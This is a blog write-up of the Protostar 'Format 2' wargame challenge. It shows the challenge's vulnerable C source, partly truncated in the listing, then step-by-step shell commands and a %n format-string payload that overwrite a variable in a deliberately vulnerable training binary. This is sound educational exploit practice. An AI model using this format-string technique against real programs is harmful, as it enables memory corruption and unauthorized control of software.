Saturday, December 22, 2012

exploit-exercises Protostar: Format 2

Again, with another challenge of the Protostar wargame, the source code of
Format 2 is provided as follow:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void vuln() {
        char buffer[512];
        fgets(buffer, sizeof(buffer), stdin);
        if(target == 64) {
                printf("you have modified the target :)\n");
        } else {
                printf("target is %d :(\n", target);

int main(int argc, char **argv)
Two changes are introduced compared to the previous challenge. The first is that the input should be provided through standard input and will be copied into buffer which is a local variable of vuln(), the function responsible of the vulnerable printf() call. Thus, buffer is closer to printf()'s stack and the parameter position we will use should be way lower compared to Format 1.
The second is that target variable should be changed into a specific value: 64.
We start by finding the parameter position that will point to the start of
user@protostar:/opt/protostar/bin$ echo "AAAA%x.%x.%x.%x.%x.%x.%x.%x.%x" | ./format2
target is 0 :(
The start of buffer is at the 4th position, and could be reached with direct parameter access.
user@protostar:/opt/protostar/bin$ echo "AAAA%4\$x" | ./format2
target is 0 :(
Next, we get the address at which, the target variable is stored.
user@protostar:/opt/protostar/bin$ objdump -t ./format2 | grep target
080496e4 g     O .bss   00000004              target
With all the needed info, we can start writing into target variable.
user@protostar:/opt/protostar/bin$ python -c 'print "\xe4\x96\x04\x08%4$n"' | ./format2
target is 4 :(
user@protostar:/opt/protostar/bin$ python -c 'print "\xe4\x96\x04\x08AAAA%4$n"' | ./format2
target is 8 :(
%n will write into the target address the number of bytes printed so far. A shortcut to pad enough bytes is to use the minimum field width.
user@protostar:/opt/protostar/bin$ python -c 'print "\xe4\x96\x04\x08%60d%4$n"' | ./format2
��                                                         512
you have modified the target :)
And that is it.

No comments:

Post a Comment